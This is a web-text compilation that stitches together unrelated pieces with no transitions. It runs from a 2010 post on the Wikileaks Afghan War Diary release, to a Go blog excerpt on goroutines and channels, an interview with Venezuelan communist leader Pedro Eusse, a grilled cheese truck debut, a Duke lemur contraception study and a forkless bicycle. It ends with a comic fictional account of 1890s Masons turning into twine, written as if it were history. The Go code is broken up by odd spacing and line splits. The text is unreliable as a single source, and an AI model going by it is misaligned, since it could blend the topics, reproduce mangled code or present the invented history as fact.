The archive is not yet published ( or referenced ) at Wikileaks.org at the time of this blog post , but The archive is available here at Wikileaks , and links to coverage in the aforementioned three newspapers follow .
By those news reports , it would appear that this cache was part of what Pfc. Bradley Manning is believed to have leaked to Wikileaks .
The " War Diary " page at Wikileaks states :
We have delayed the release of some 15,000 reports from the total archive as part of a harm minimization process demanded by our source .
After further review , these reports will be released , with occasional redactions , and eventually , in full , as the security situation in Afghanistan permits .
The White House has issued a response .
The statement from national security adviser Gen. James Jones emphasizes two points : first , the administration asserts that this leak of classified information endangers the lives of Americans and America 's war allies .
Second , the administration points out that the logs cover actions between January 2004 ( when Bush was in power ) and December 2009 ( when President Obama announced a " new approach " to the war in Afghanistan ) .
" Afghan War Diary , 2004 - 2010 " in CSV , SQL , KML formats .
( Wikileaks )
" The War Logs " ( NYT )
" Inside the Fog of War : Reports From the Ground in Afghanistan " ( NYT )
" Text From a Selection of the Secret Dispatches " ( NYT )
" In Disclosing Secret Documents , WikiLeaks Seeks ' Transparency ' " ( NYT )
" Piecing Together the Reports , and Deciding What to Publish " ( NYT )
" Julian Assange on the Afghanistan war logs : ' They show the true nature of this war ' " ( Guardian )
" Wikileaks Afghanistan files : download the key incidents as a spreadsheet " ( Guardian )
" Afghanistan war logs : Story behind biggest leak in intelligence history " ( Guardian )
" Afghanistan war logs : the glossary " ( Guardian )
" Secret files : Wikileaks exposes ' unseen war ' " ( Channel 4 News )
Image :
An interactive map available at the Guardian website shows locations and dates tied to documents in the leaked Afghanistan war logs .
Andrew Gerrand
13 July 2010
Traditional threading models ( commonly used when writing Java , C++ , and Python programs , for example ) require the programmer to communicate between threads using shared memory .
Typically , shared data structures are protected by locks , and threads will contend over those locks to access the data .
In some cases , this is made easier by the use of thread - safe data structures such as Python 's Queue .
Go 's concurrency primitives - goroutines and channels - provide an elegant and distinct means of structuring concurrent software .
( These concepts have an interesting history that begins with C. A. R. Hoare 's Communicating Sequential Processes . )
Instead of explicitly using locks to mediate access to shared data , Go encourages the use of channels to pass references to data between goroutines .
This approach ensures that only one goroutine has access to the data at a given time .
The concept is summarized in the document Effective Go ( a must - read for any Go programmer ) :
Do not communicate by sharing memory ; instead , share memory by communicating .
Consider a program that polls a list of URLs .
In a traditional threading environment , one might structure its data like so :
type Resource struct { url string polling bool lastPolled int64 } type Resources struct { data [ ]
* Resource lock * sync .
Mutex }
And then a Poller function ( many of which would run in separate threads ) might look something like this :
func Poller ( res * Resources ) { for { // get the least recently - polled Resource // and mark it as being polled res.lock .
Lock ( ) var r * Resource for _ , v := range res.data { if v.polling { continue } if r == nil || v.lastPolled < r.lastPolled { r = v } } if r != nil { r.polling = true } res.lock .
Unlock ( ) if r == nil { continue } // poll the URL // update the Resource 's polling and lastPolled res.lock .
Lock ( ) r.polling = false r.lastPolled = time .
Nanoseconds ( ) res.lock .Unlock ( ) } }
This function is about a page long , and requires more detail to make it complete .
It does n't even include the URL polling logic ( which , itself , would only be a few lines ) , nor will it gracefully handle exhausting the pool of Resources .
Let 's take a look at the same functionality implemented using Go idiom .
In this example , Poller is a function that receives Resources to be polled from an input channel , and sends them to an output channel when they 're done .
type Resource string func Poller ( in , out chan * Resource ) { for r := range in { // poll the URL // send the processed Resource to out out <- r } }
The delicate logic from the previous example is conspicuously absent , and our Resource data structure no longer contains bookkeeping data .
In fact , all that 's left are the important parts .
This should give you an inkling as to the power of these simple language features .
There are many omissions from the above code snippets .
For a walkthrough of a complete , idiomatic
Go program that uses these ideas , see the Codewalk Share Memory By Communicating .
Pedro Eusse , national secretary of the Communist Party of Venezuela .
Pedro Eusse interviewed by Susan Spronk and Jeffery R. Webber
July 22 , 2010 -- The Bullet --
In mid-June , 2010 , we met with Pedro Eusse , national secretary of the Communist Party of Venezuela ( PCV ) and part of the provisional executive committee of the labour confederation , Unión Nacional de Trabajadores ( National Union of Workers , UNT ) .
Revolutionary figures from times past stared down at us from the paintings hung on the walls in the office of the PCV in central Caracas .
Refusing to be interrupted by the constantly ringing phone , Pedro spoke passionately for two hours about the centrality of organised workers in the revolutionary struggle and the need to unite the labour movement .
He expressed his hopes for rebuilding the UNT at its third congress planned for fall 2010 .
What was your political formation ?
I first joined the Communist Party Youth of Venezuela in the state of Zulia , fundamentally an oil - producing state in the west of the country .
When I joined the Communist Youth I was just finishing high school , and had begun working at an agricultural production company .
I was 17 or 18 and became involved in the union .
Therefore , my initiation into the Communist Party coincided closely with my initiation into the labour movement .
An anecdote will reveal what union politics was like in Venezuela at the time .
I was involved in the organisation of a strike in our company against the abuses of excessive working hours .
As a consequence of this , I was fired .
From that point forward I have been dedicated full time to political work , and work within the labour movement more specifically .
Over the years I assumed responsibilities within the party at the national level , as part of the executive of the Communist Youth of Venezuela .
This was around the end of the 1980s , and I was in Caracas when the Caracazo rebellions occurred .
Around the same time I had also assumed responsibilities within the Central Unitaria de Trabajadores de Venezuela ( CUTV ) , which was founded in 1963 .
I began my role as a youth leader in this union confederation beginning in the late 1980s , and later I was elected to be general secretary .
So , my union activities have been very much integrated with my political work .
The decision for me to dedicate myself to a leadership role within the CUTV was a decision of the party .
I had experience in the union struggle and therefore I was deemed right for the job .
In the current conjuncture we are in the process of building a union current called La Corriente Clasista de Trabajadores “ Cruz Villegas ” ( Classist Current of Workers “ Cruz Villegas ” – CCT - CV ) .
Cruz Villegas had been a leader of the CUTV , a veteran Communist Party union leader in Venezuela , who was tortured and imprisoned during the era of the dictatorship of Marco Pérez Jiménez ( 1952-1958 ) .
Cruz Villegas died two years ago .
So the new current is attempting to keep the class struggle spirit of Cruz Villegas and the CUTV alive .
The new current , CCT -CV , was formed with the idea of uniting the labour movement .
We have , for all practical purposes , deactivated the CUTV .
The CUTV had been a very small workers ’ centre , fundamentally composed of Communists .
It was very strong in the 1960s when it was first founded , and maintained a pluralist perspective , because there were other currents involved alongside the Communist Party current .
But all currents were on the left .
The CUTV was the traditional leftist workers ’ centre of the labour movement .
But for a number of reasons it began to diminish in strength and in numbers .
One of the causes was the strategy adopted by the Acción Democrática ( Democratic Action , AD ) party , which was in power at the time , together with FEDECAMARAS ( the business federation ) , the US State Department and the transnational petroleum companies , to create a new kind of trade unionism .
The political pact Punto Fijo , established in 1958 , ultimately required a workers ’ centre to express its interests , and this was the Confederación de Trabajadores Venezolanos ( Confederation of Venezuelan Workers , CTV ) .
The CTV established control over the public - sector workers , all the state enterprises and all the enterprises controlled by transnational capital .
This strategy succeeded in diminishing the numbers and strength of the CUTV over time .
The other factor contributing to the reduction of the CUTV was the international political and economic situation , the liberalisation of trade , which was thrust on Venezuela through the International Monetary Fund , which demanded a series of neoliberal policies .
The textile , metal - mechanical and other sectors of Venezuela 's economy practically collapsed .
And these were areas where the CUTV had had a substantial presence .
As the reduction of industry advanced , the CUTV was left eventually with almost no affiliates .
So when Hugo Chávez won the presidency in 1998 , and initiated the constituent assembly in 1999 , and this entire process of change , all of us on the progressive and radical left decided to put tremendous effort into destroying the power of the CTV within the labour movement .
We wanted to defend the interests of workers and defend the revolutionary process .
So , we decided that continuing to work through the CUTV would not be the best way to contribute to this renewal of the labour movement , but rather through the creation of a new union current that would operate in wider spaces .
So we created this new current , and deactivated or put on hold , the CUTV .
That 's some of the story of how I was shaped politically .
Today , I 'm a part of the provisional leadership of the new labour confederation , the Unión Nacional de Trabajadores ( National Union of Workers , UNT ) .
Elections are still pending .
We 've pushed very hard for the UNT to regulate its basic functions , so that it can become an authentic workers ’ centre , with the capacity to struggle , to unite and mobilise the workers – so that it is independent from the state , from the party and from the bosses .
And together with other currents we 've been able to achieve some level of reactivation of the UNT .
We 're in a position to hold a national congress in which we might finally transcend the divisions .
It 's normal and inevitable that there will be internal conflicts , the problem is when these conflicts become paralysing , divisive and destructive .
In the past this sort of destructive division has clearly been evident in the UNT .
I 'm not sure how aware you are of this .
Can you tell us about the events that led to the breakdown of the UNT ?
The UNT had what you might call a birth defect .
The UNT was created in a very bureaucratic manner , with little debate among the workers themselves , and with little participation by the workers .
It was very much created from above , essentially being the product of the will of a few leaders .
The first leadership of the UNT was simply appointed from above .
It was not a product of consultations with the rank and file .
There were no elections .
The positions were merely distributed .
Therefore , in this first phase , [ the CCT - CV ] decided not to participate in the UNT , because this sort of practice has no validity .
Your actions have to be equal to your words .
If we were promoting democratic unionism – not simply a formal democracy but a class democracy – if we wanted a unionism that broke with the bureaucratic and elitist schemes of the past , characteristic of the old CTV , we could not participate in the UNT as it was taking shape initially .
We wanted to create a unionism that would spark a new hope for Venezuelan workers , and this was n't going to happen with the characteristics that the UNT exhibited initially .
The first congress of the UNT , for example , was n't an authentic congress because there were no elected delegates .
There were no preliminary documents submitted for debate .
There was basically a consensus that the first attempt was problematic , and so a second congress was held in 2006 in order to really debate the project , the statutes and the principles of the workers ’ centre .
This second congress was a disaster , however , which ended in blows .
Discontent had been building for so long .
The different factions saw the UNT as “ their ” organisation and treated other factions as irreconcilable enemies .
The situation was even more lamentable due to the fact that there were international representatives of the labour movement present at the congress .
I attended this congress as a guest .
At the time we were in a period of transition , attempting to incorporate ourselves into the UNT .
But there was no one to talk to .
If you wanted to talk to the UNT you had to talk to all the different tendencies separately since there was no leadership .
This congress caused one of the most important currents , the Fuerza Bolivariana de Trabajadores ( the Bolivarian Force of Workers , FBT ) to leave the UNT , along with the Trotskyist current led by Orlando Chirino , and a number of other currents , dividing the labour movement .
The FBT is one of the most important – although problematic – currents of the Venezuelan labour movement because it was the union instrument of the Movimiento Quinta República , Chávez 's political formation at the time .
After its separation , the FBT began to work toward building an entirely new and distinct workers ’ centre , over which it wanted to have absolute and unconditional control .
This new centre , called Central Socialista de Trabajadores ( Socialist Workers ’ Central , CST ) has not been constituted in practice .
The new proposed centre would be a threat to the independent labour movement because the FBT is against any confrontation with the state .
The Venezuelan state continues to be a bourgeois state , even if it has undergone some changes during the Chávez period .
The FBT argue that the labour movement should not confront the state because the state is still transforming itself .
Its lack of independence from the state has been expressed time and again .
For example , during the Sidor strike in 2008 , the FBT defended the bosses and abandoned the workers .
It did this openly .
In this period the minister of labour , Jose Ramón Rivero , a militant of the FBT , had tight relations with the governor Rangel Gómez in the state of Bolívar , where Sidor is located .
Gómez is completely right wing – although ostensibly part of the Bolivarian process , like many others “ in the process ” he is actually fundamentally on the right .
So , Rivero took the side of the Argentine multinational that owned Sidor against the workers .
And the FBT aligned itself with Rivero , failing to show even the smallest sign of solidarity with the workers who were violently repressed by the police and the National Guard .
Another example is the strike that occurred in 2009 in the Mitsubishi plant in Anzoátegui .
In this case there was a police assault on the workers that resulted in two deaths .
And the Ministry of Labour gave the green light for Mitsubishi to fire 11 of 15 union leaders at the plant , destabilising the union .
An unknown number of workers were also fired .
The objective of the Ministry of Labour and Mitsubishi was to destroy the union 's capacity for resistance .
Rather than siding with the workers , the FBT condemned the union , saying it was full of anarchists who were sabotaging the company .
At no moment did they express solidarity of the workers , or question the position being taken by the company , or the horrible assassinations of workers that took place .
Nor did the FBT reject or condemn the firing of the union leaders and other workers .
Given this , how are we supposed to work with this union current ?
It must be defeated .
So with all the problems that are evident in the UNT , it is nonetheless essential that we work toward building it , so that it becomes an authentic instrument for the workers , with independence from the bosses , the state , and the party .
The Communist Party , and the current that represents it within the UNT , has made a series of proposals , which it is discussing with the rank and file , in an attempt to build consciousness amongst the workers of their role in society .
We 've called for the establishment of socialist workers ’ councils .
There is also a proposal for a law defending this position that is currently before the National Assembly .
The other problem with the UNT from the very beginning was the proposal for the opposite extreme of horizontal unionism , under which no one would have responsibilities of leadership ; everyone would simply be equal promoters of the UNT .
We [ the CCT ] were never in agreement with this , either .
And , fortunately , once we joined the UNT we defeated this idea through struggle and open debate .
We were n't in agreement with horizontalism because a union movement has to be an instrument for combat , for struggle .
It has to have the capacity to respond , and to maintain unity .
In the period in which there was no leadership , and all the sections in the UNT were equal , each one of the coordinators spoke for themselves as if they were speaking for the UNT .
So one representative of the UNT would say something , and another leader would denounce it .
This was absurd .
It made building an effective , wide - reaching union movement impossible .
It turned into a situation of permanent confrontation , and generated irreconcilable conflicts .
The UNT ended up destroying itself .
It 's true that today in Venezuela there is the presence of participatory and protagonistic democracy , without a doubt , but this does not negate representation – whether at the level of the state or in social organisations .
For example , when a community elects a spokesperson for their communal council they are electing a representative who is subordinate to the sovereignty and will of the decisions of the people through communitarian assembly .
And this is the way it should be .
But it must be understood that this is a form of representation .
In short , we need representatives , but not representatives that usurp the power of the collective .
Representatives that express the positions arrived at through debate in the rank and file , through mechanisms established in the assembly of the UNT .
Now that this horizontalist orientation has been defeated , the current debates and struggles revolve around different currents attempting to consolidate more influence and leadership within the UNT .
This is normal and should n't be seen as problematic .
It only becomes a problem when the struggle for leadership ends up destroying the organisation itself .
What has been the role of the labour movement in the process ?
The most important weakness of the revolutionary process in Venezuela today is the absence of a protagonistic workers ’ movement , with independence , with strength , with proposals , with its own demands .
It is still necessary to build a movement of workers with revolutionary objectives – without renouncing the importance of demands for reform .
There are revolutionaries in all the sectors of the labour movement , such as in Guayana .
There are many unions that are run by reactionaries or reformists , but the rank and file workers in Guayana have made real advances in their consciousness .
Through the Socialist Plan for Guayana there has been an experience of direct workers ’ management of these enterprises , and determining how workers should control the means of production .
The workers in the petroleum sector have also advanced , but there is still a great deal of influence from the bureaucracy .
The revolutionary currents within the petroleum sector are still weak .
Many will say , “ yes , we 're with Chávez , we 're with the process ” , but they have n't asked what is the transformative role of the workers in the process .
Are you with Chávez because he 's increased your salaries and improved the working conditions in your sector , or are you with Chávez because we 're going to abolish this capitalist mode of production and build socialism ?
While there are some pockets of activity , many of the unions in Venezuela today describe themselves as Bolivarian , revolutionary , and even socialist , but are reformist in practice .
These unions therefore do not see their role as transforming society and the means of production , but rather as achieving minor economic improvements for workers , better salaries and collective contracts for their members .
They do n't see their role as struggling for transformation .
This is a major problem that we have to confront , for the absence of such a [ revolutionary union ] movement has allowed other social sectors , other social classes to have an influence on the revolutionary process .
These sectors have specific conflicts with US imperialism , with the transnationals , but they are also opposed to socialism .
The bourgeoisie is never going to be in favour of socialism , nor is the petty bourgeoisie .
There are , of course , bourgeois or petty bourgeois individuals who will support the objectives of constructing socialism , but they are exceptions .
As classes , as social instruments , these classes are going to defend their interests – their positions and privileges – and these interests are of course contradictory to the interests of the working class .
The petty bourgeoisie has captured control over much of the public administration , and state enterprises .
And so we have these layers controlling public administration , without any type of social control or workers ' and community control , in the petrochemical industry , the state enterprises in Guayana , and so on .
And they act in their own interests , through mechanisms of corruption , accumulating wealth and economic resources .
Obviously this sector is not going to promote the submission of these companies to social control , from which they stand to lose .
President Chávez , in the last two years especially , has tried to change the economy , the mode of production and the form of the state .
But the problem is if these objectives are not taken up with force , passion and intelligence by the workers themselves , the bureaucracy within the public administration – the petty bourgeoisie that has control over the important parts of the Venezuelan state – will prevent these objectives from going forward .
If a company is nationalised and then run in the same way a private company before it , workers are not going to feel that this is their project .
It 's often the case that the bosses of the public companies commit as many abuses against workers as the private bosses .
Obviously , this situation is not automatically resolved through nationalisation .
We are in favour of the nationalisations that have taken place , and this process of expropriations must continue , but the contradictions must be acknowledged .
For example , we supported the move by the government to expropriate some of the monopolies that currently control the production of food in the country , such as Polar .
But the problem is that the state companies that have been created for the production and distribution of food meet only a tiny proportion of the country ’s needs .
We have not overcome the extreme dependency on food imports .
So there are still a small group of companies that controls approximately 80 per cent of the food that is produced in the country , and the food that is imported as well .
The only way the government can ensure that these small groups do not use their power to engage in speculation , and to engage politically in a counter - revolutionary manner , is through expropriation .
We are proposing the nationalisation of the banks , so that private interests do not control access to financial resources , and so that these resources can be used to strengthen the fundamental productive sectors of the economy .
We are also demanding more profound and far - reaching nationalisations that include new forms of management , involving collective control over decision making .
We need to move beyond statisation and toward socialisation of the means of production .
The problem is that the sectors I ’ve mentioned – the bureaucracy and the petty bourgeoisie which controls it – are resisting such a transition .
They say , “ Sure , let ’s nationalise the enterprises , but we will control them ourselves . ”
This is the fundamental contradiction at a general level that will not be resolved in favour of workers , in a revolutionary socialist direction , without a labour movement like the one I ’ve been suggesting we require .
This is why we 've been proposing things such as the socialist workers ’ councils , and building a workers ’ movement with a revolutionary orientation , a workers ’ movement that incorporates workers from the public , private and mixed sectors of the economy , and a movement which incorporates all the currents that are with the revolutionary process .
What is the relationship between the communal councils , on the one hand , and the labour movement on the other ?
There are very few relations between the two .
The labour movement is too weak to establish such relations with the comunas , which are an important part of the Bolivarian process .
There are isolated examples , however .
Some comunas have begun constructing housing , for example , and have tried to establish relations with construction unions .
But it ’s often a very complicated and conflictual relationship , because the construction unions in Venezuela have deteriorated a great deal .
Some of them can hardly be called unions ; rather , they are better described as mafias that control access to work .
Many times , the unions attempt to establish control over the comuna to determine who works in the construction projects .
This has occurred when communities have tried to build their own schools , health clinics , sports centres , and so on .
And it has created a dynamic where the comunas try to avoid relations with the construction unions .
Because , many times , the construction unions have not served the interests either of the workers or the community , but rather those of the union leaders .
Our position that we ’ve expressed to comrades in the communal councils and to construction workers is that the existing unions need to transform themselves so that they can work effectively with the comunas .
Just because the unions are controlled by a mafia today does not justify a perspective which opposes the unionisation of the construction industry in general .
Having unions is important because often the infrastructure and housing built in the comunas is contracted out – either by the comuna itself or by the Ministry of Public Works and Housing – to private contracting companies .
So these private companies that have the necessary machinery , technology and resources try to hire labourers at the lowest cost possible in order to make the most profits possible , even when it means violating the rights of workers .
The comunas should use unionised labour , but there is no planned , organised and political relationship between the comunas and the labour movement , which is a major weakness .
As a point of clarification , from your perspective what are the most important social forces within the Bolivarian process ?
There 's a variety of social forces at play in the Bolivarian process , as I suggested earlier .
The petty bourgeoisie has the most influence in the process , progressive sectors of the petty bourgeoisie in many cases .
These sectors were radicalised by their experience with neoliberalism in the 1980s and 1990s when sections of the bourgeoisie , the petty bourgeoisie , and the middle classes were thrust into social conditions of misery , as they were replaced by more powerful fractions of the bourgeoisie .
This dynamic is what helped to create a very wide base for the opposition against the politics of AD and COPEI .
And Chávez therefore received a very impressive level of support , and not only from the most impoverished sectors of the population – peasants , workers and the lumpenproletariat – but also layers of the middle class and the petty bourgeoisie .
So , when discussions begin around the necessity of this process transitioning toward socialism , contradictions rise to the surface .
These middle - class layers , the petty bourgeoisie and parts of the national bourgeoisie only want to strengthen themselves vis-à - vis making alliances with the transnationals with the support of the Venezuelan state .
And they have received this support through oil rents .
So when popular forces demand the socialisation of the oil rents , the means of production and the political process , these sectors mount serious opposition .
This dynamic creates a contradictory situation .
As a whole , when we look at the Bolivarian process the sector with the most power has been the petty bourgeoisie , in both its civilian and military components .
There are many military officials who are committed to the defence of President Chávez who are from the professional middle class .
Some of them also constitute part of the petty bourgeoisie because they own tracts of land , and they own properties .
The key thing to confront is that if there is no clear commitment to a new mode of public administration , a new mode of economic management , which is participatory and democratic and subordinated to the will of the workers and the community , these objective contradictions are going to express themselves .
There are subjective and objective contradictions within the public administration bureaucracy .
There are some who defend their objective interests against the interests of workers and the people .
And there are others who , because of their loyalty to Chávez or their conviction that a revolution is necessary , defend the revolutionary process .
But if there is no clear position on what role the state must play , the institutions and the public enterprises , to revolutionise the form of management and leadership , the objective contradictions of the situation will continue to prevent the deepening of the revolutionary process .
What can resolve this situation ?
A strong workers ’ movement , in alliance with the comunas , can push the process in a revolutionary direction .
One of the obstacles is that many of the people working within the comunas do not share this perspective .
They see the formation of the communal councils merely as a way of meeting very short - term , immediate demands of their communities .
They do not see their role as transcending these issues as transforming the integral structures of society .
The communal councils , the workers and the peasantry will need to confront the monopolies that continue to control large sections of the means of production , as well as the bureaucracy within the public administration .
If communal councils are formed merely to receive money from the state and to deliver basic needs to their communities they will not play a revolutionary role .
It is also the case that there are people who work through the communal councils to appropriate the money that is coming from the state and is meant for the community .
This explains why in some communities there are intense internal struggles over who will control the resources coming from the state .
These conflicts are expressions of residual capitalist values , and in particular values associated with a backwards capitalism that has been extremely dependent on the state , and on oil rent .
This tradition of struggle over oil rents has generated these types of deformities and values , which run against production , and gravitate instead toward merely capturing the resources of the state .
Changing themes for a moment , what are the strengths and weaknesses of the PSUV ( United Socialist Party of Venezuela ) as a party ?
To begin with the strengths , it was certainly the case that Chávez and the revolution required and still requires a way of unifying individuals and political currents who support Chávez , and who are not inclined to join the Communist Party of Venezuela ( PCV ) or other pre-existing parties of the left .
Prior to the PSUV there was the Movimiento Quinta República ( Fifth Republic Movement , MVR ) , but it did n’t have the characteristics of a party .
It was fundamentally an electoral instrument .
Moreover , there were many movements outside of the MVR that supported the process but were isolated , which have now been integrated into the PSUV .
These are positive developments which have allowed for , among other things , important electoral and political victories .
But the weaknesses of the PSUV , from our point of view , have to do with the fact that it is a multi-class party that tries to bring together irreconcilable class interests .
There are individuals and sectors within the party that are affiliated with fractions of the urban bourgeoisie , as well as the landholding class and ranchers .
There are within the party owners of small , medium and also large private enterprises .
These sectors exist together with landless peasants , workers , super - exploited sectors of the population , progressive middle - class sectors and revolutionary intellectuals .
There are therefore sectors within the party whose interests lead them to the necessity of revolution and socialism , and others whose interests are in maintaining capitalism , albeit a reformed capitalism .
All of these interests coexist within the PSUV .
Likewise , there is a similar level of ideological diversity within the party .
This permanent internal tension and contradiction makes it very difficult for the party to organise the popular sectors and build socialism .
These internal contradictions express themselves at different moments , including for example during electoral periods .
So we have representatives of the PSUV who have won mayoralties and governorships who are clearly aligned with fractions of the bourgeoisie and petty bourgeoisie .
And once they have won these positions they use their institutional power to enhance the internal contradictions within the party .
This is what is happening right now .
When they hold internal elections , they proceed precisely as any bourgeois party would .
Each candidate defends their position against the others , and whoever has the most money to promote their cause through advertising and so on , wins against those candidates who lack these resources .
The ideology of the party is also confused because of the competing interests and currents , and so on .
Harmonising and building a hegemonic ideology within the party is practically impossible .
We are allies of the PSUV despite these weaknesses since the party does have support within the masses , which enables it to win elections .
So at the electoral level , the PSUV has achieved an important level of efficiency .
In the current moment , this is a necessity .
But looking beyond the immediate conjuncture and into the future , the intrinsic weaknesses of the PSUV could very well put the revolutionary process at risk .
We can see that there is a new counter - offensive of imperialism being launched in Latin America , with the coup in Honduras , the new US military bases in Colombia , the elections of right - wing Sebastian Piñera in Chile , destabilisation campaigns in Bolivia and Ecuador , and so on .
What is the imperialist strategy in relation to the Bolivarian process in Venezuela ?
It ’s clear that there is a multifaceted imperialist strategy against Venezuela .
On the one hand there is a strategy to steer international public opinion away from the revolutionary process through the private media abroad and within the country itself .
The instruments of ideological domination are lethal weapons , not only against the Venezuelan revolution but against Latin American revolutionary processes .
They are continually generating a false image of this process – that Chávez is a dictator who wants a dictatorship , who violates human rights .
The last few years there has been a propaganda campaign which says that President Chávez supports terrorism , and that the revolutionary process is connected to drug trafficking .
It ’s the same set of tools that has been used in the past against other revolutionary processes .
This aspect of imperialist strategy has n't had as much success as it might have considering the efforts put into it .
Chávez has proved to be very agile in forging direct and wide - ranging international relationships , which has helped the process immensely .
So this imperialist campaign to manipulate public opinion internationally is clashing directly with the international orientation of the leadership of the Bolivarian process .
The other possibility , besides the media campaign to satanise Chávez , is direct military attack .
We can never exclude the possibility of a military offensive against Venezuela .
This possibility is clear in the rebuilding of military forces , practically surrounding Venezuela – in Colombia there are seven bases with US military presence , they ’ve maintained a presence in Peru and Paraguay , and in the Caribbean with the reactivation of the Fourth Fleet .
This is bound to continue to increase , because there is no discontinuity in the external affairs of the US state between Bush and Obama – perhaps there are differences in forms of political diplomacy , but there is a deep continuity on the levels of military and economic strategy .
We never had any illusions that the foreign policy of Obama would be distinct .
The president of the United States is a functionary of imperialism , whether he ’s black or white .
In addition to the media strategy and the build up of US military presence in Latin America , around Venezuela , there is also the strategy of moving paramilitaries from Colombia into Venezuela .
The Colombian state is a political operative against the revolutionary processes in Latin America ; it has been activated for this purpose .
And , in addition to the movement of paramilitaries , there is an open political provocation against Venezuela that could become a military provocation .
The leadership of Colombia under the presidency of Juan Manuel Santos is a threat because he could provoke a military conflict with Venezuela in order to justify an imperialist intervention .
This is perfectly possible .
There is also the strategy of imperialist meddling in the internal contradictions of the process , for example within the Venezuelan military .
The Venezuelan military was created with the imperialist vision that its role was to police the country against internal threats ; there are officers who are opposed to the process and who still share this vision .
Of course , they have been weakened substantially , because Chávez has built up revolutionary forces within the military .
But some officers say they ’re with the process , but are waiting for an opportune moment to reactivate themselves .
This is a very real possibility .
We already had the experience of the coup attempt of April 2002 .
Military personnel who had seemed to be with the president were the operatives behind the coup d’état .
So this could be one of the lines of action that imperialism attempts to take advantage of .
And , of course , imperialism uses the internal forces of opposition within Venezuela to foment instability and economic destabilisation , to engage in speculation and so on .
We know that there are counter - revolutionaries occupying positions within the state .
They could be activated in opportune moments .
The problems that have been occurring within the food industry are likely not merely the result of irresponsibility and corruption , but rather intentional sabotage .
All of these components form part of a totality of lines of action intended to weaken the internal process and to foment a coup from outside the process .
For these reasons it 's important to strengthen the revolution .
The role of the PSUV , in spite of all its weaknesses , will be important .
That the PSUV can activate a popular mass in these times will be important , to destroy whatever counter - revolutionary initiatives .
We 've argued , though , that the revolution can protect itself through a collective unity within its leadership .
So Chávez can align himself with the PSUV , but also with the PCV .
It 's important to construct a type of broad front , with a collective leadership , so that Chávez can lead together with the PSUV , the PCV and other factors of the revolution that might be small but have a revolutionary quality .
We could establish a political - social front , to transform the state and neutralise the counter - offensive by the enemies of this process .
To the present , we have n't joined in such a front .
There is unity when there are elections , but not during the rest of the time .
This is a big weakness in the process .
[ This article first appeared at The Bullet , the website of Canada 's Socialist Project .
Susan Spronk teaches in the School of International Development and Global Studies at the University of Ottawa .
She is a research associate with Municipal Services Project and has published several articles on class formation and water politics in Bolivia .
Jeffery R. Webber teaches politics at the University of Regina .
He is the author of Red October : Left - Indigenous Struggles in Modern Bolivia ( Brill , 2010 ) and Rebellion to Reform in Bolivia : Class Struggle , Indigenous Liberation and the Politics of Evo Morales ( Haymarket , 2011 ) . ]
It 's no surprise that the Grilled Cheese Truck 's debut last night drew hundreds of people who braved the windy weather and long wait .
After all , it 's grilled cheese , America 's ooey gooey classic comfort food .
Add to that Los Angeles ' recent and growing obsession with gourmet food trucks hitting the streets and you 've got the perfect recipe .
Chef Dave Danhi ( Water Grill , Roxbury Supper Club , Habana , Georgia ) was at the Grilled Cheese Invitational earlier this year when he realized how crazy people get over the sandwich .
The lines were five people wide and looked to be about a mile long .
The event 's success was a failure for hundreds who showed up and left without even seeing a grilled cheese .
Some of them took advantage of the Green Truck parked outside .
As Danhi walked out , it was all too obvious and the Grilled Cheese Truck concept was born .
Two months ago , Danhi and is partner Michele Grant started to tease Twitter followers with delicious photos of their creations as they readied themselves for the streets .
Finally , last night they made a delicious debut , although not without some drama .
A griddle broke right as they planned to start serving , causing a hour and a half delay .
Mechanics were called and with one working griddle free samples of grilled cheese and soups ( tomato and pumpkin ) were handed out .
" Fucking awesome , " one person in line said as he ate a sample sandwich filled with sharp cheddar , macaroni , BBQ pork and caramelized onions .
Hormonal birth control alters scent communication in primates
Hormonal contraceptives change the ways captive ring - tailed lemurs relate to one another both socially and sexually , according to a Duke University study that combined analyses of hormones , genes , scent chemicals and behavior .
Contraception alters the chemical cues these scent - reliant animals use to determine genetic fitness , relatedness and individuality .
And , as a sort of double whammy to birth - control efforts , male lemurs were shown to be less interested in females that were treated with contraceptives .
" Hormonal contraception is known to alter the attractiveness of scent cues in humans and the presence of fertility cues in other primates , " said Christine Drea , an associate professor of evolutionary anthropology at Duke .
" We wanted to understand all the ways in which contraception changes scent cues and the subsequent way these animals might interact with each other . "
A dozen female lemurs at the Duke Lemur Center were given monthly injections of the contraceptive Medroxyprogesterone acetate , or MPA , ( marketed as Depo - Provera by Pfizer ) .
Drea 's chemical analysis found that they expressed different scent molecules than " intact " females , significantly altering the signals females send about themselves to social contacts and prospective partners .
In other words , they smell funny .
The findings are part of a series of studies that Drea 's group has done using chromatography to tease apart the chemical components of the rich stew of scents produced by lemurs .
A female lemur 's scent normally conveys not only her fertility status , but also information about identity , her relatedness to others and her genetic homozygosity , an indicator of in - breeding .
If all of that information is scrambled by hormonal contraception , it may in part explain changed patterns of aggression that other studies have noted when captive primates are treated with contraceptives , Drea said .
In this study , the 12 females served as both intact and contracepted females by being sampled in each condition .
Under contraception , the females were found to express some scents that intact females do not , and to express scents in different proportions .
The contracepted females also tended to lose their scent individuality .
" There 's something very different about these gals , " Drea said .
" If animals are figuring out who their kin are by scent , she no longer smells like her brother . "
In behavioral tests , the 13 males in the study showed clear preferences for the scents of intact females , spending less time investigating odor samples from contracepted females .
The bigger question is whether these findings are relevant for our own species , Drea said .
Humans are known to send and receive olfactory cues about hormonal status and possible compatibility .
" One has to wonder if human mate choice might be affected in some of the same ways it has been in these primates , " Drea said .
Finnish bicycle designer Olli Erkkila has always designed bicycles that can really surprise us .
Look at the white bike below .
It is his graduation project for Institute of Design in Lahti .
Have you discovered the difference ?
It works without front fork .
The odd bicycle just adopts a modified frame that is steered using handlebars connected to a steering rod that turns the front wheel .
The frame is modified to support the rider in the absence of the front fork , with added tubing below the seat .
enjoy ~
His wove and corruggated [ sic ] face held a satin mien so soft as to appeal to the very heart shuddering within the breast of this boy ; and yet it done hid a sternness as I had never seen outside the noose .
The other stable boys and me set out to remove the ladies present away from this braided golem , though we hardly needed for to plead with the better womenfolk .
I dispatched the younger boys to chase off the most infatuated harlots , and I myself come back to quiet the horses : kicking as they were , it seemed like to alarm Henequen .
The Twiners of the 1890s still stand as an object lesson in hubris for today 's ultra-modern scientific community .
In 1891 , impressed by recent advances in textiles , a splinter group of Masons headed by the towering doctor Saul Henequen relocated to a Georgia retreat and began to convert themselves into twine .
It was their belief that twine embodied the essence of what was most puissant and honorable in man , and to them it was inevitable that all men would one day be comprised of twine .
The Twiners began as a humanitarian movement , intent on pacifism and tolerance , but during the Sisal Lash Incident of 1894 its members became fractious .
The militant voices among them , as is sadly still too often the case , held sway .
